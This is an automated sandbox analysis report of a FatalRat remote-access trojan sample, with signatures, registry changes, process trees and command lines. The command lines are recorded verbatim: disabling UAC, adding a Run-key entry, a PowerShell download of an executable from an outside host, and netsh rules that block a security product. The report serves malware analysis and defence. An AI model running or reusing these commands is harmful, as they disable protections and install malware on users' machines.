Malware Analysis Report

2025-03-15 03:48

Sample ID 250223-p1gvdaypv9
Target 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk
SHA256 b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
Tags
fatalrat defense_evasion discovery execution infostealer persistence privilege_escalation rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d

Threat Level: Known bad

The file 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk was found to be: Known bad.

Malicious Activity Summary

fatalrat defense_evasion discovery execution infostealer persistence privilege_escalation rat stealer trojan

FatalRat

Fatalrat family

UAC bypass

Fatal Rat payload

Blocklisted process makes network request

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Drops desktop.ini file(s)

Command and Scripting Interpreter: PowerShell

Checks installed software on the system

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Modifies registry class

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-23 12:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-23 12:47

Reported

2025-02-23 12:50

Platform

win10v2004-20250217-en

Max time kernel

146s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

Signatures

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" C:\Windows\System32\reg.exe N/A

Checks installed software on the system

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\programdata\20250223024745\Agghosts.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Videos\bin.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\programdata\20250223024745\Agghosts.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\programdata\20250223024745\Agghosts.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\URL Protocol C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\ = "URL:TonSite Link" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\ = "URL:Telegram Link" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\URL Protocol C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\programdata\20250223024745\Agghosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4888 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 4888 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 4888 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024745\Agghosts.exe
PID 4888 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024745\Agghosts.exe
PID 4888 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024745\Agghosts.exe
PID 2220 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2220 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4888 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 4888 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 4888 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 4888 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 4888 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 4888 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2080 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2080 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1208 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2080 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2080 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1208 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 3188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 3188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1208 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2080 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Videos\bin.exe
PID 2080 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Videos\bin.exe
PID 2080 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Videos\bin.exe
PID 4188 wrote to memory of 3528 N/A C:\Users\Public\Videos\bin.exe C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp
PID 4188 wrote to memory of 3528 N/A C:\Users\Public\Videos\bin.exe C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp
PID 4188 wrote to memory of 3528 N/A C:\Users\Public\Videos\bin.exe C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp
PID 3528 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
PID 3528 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024745\1.bat" "

C:\programdata\20250223024745\Agghosts.exe

"C:\programdata\20250223024745\Agghosts.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024745\fhq.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile settings inboundusernotification disable

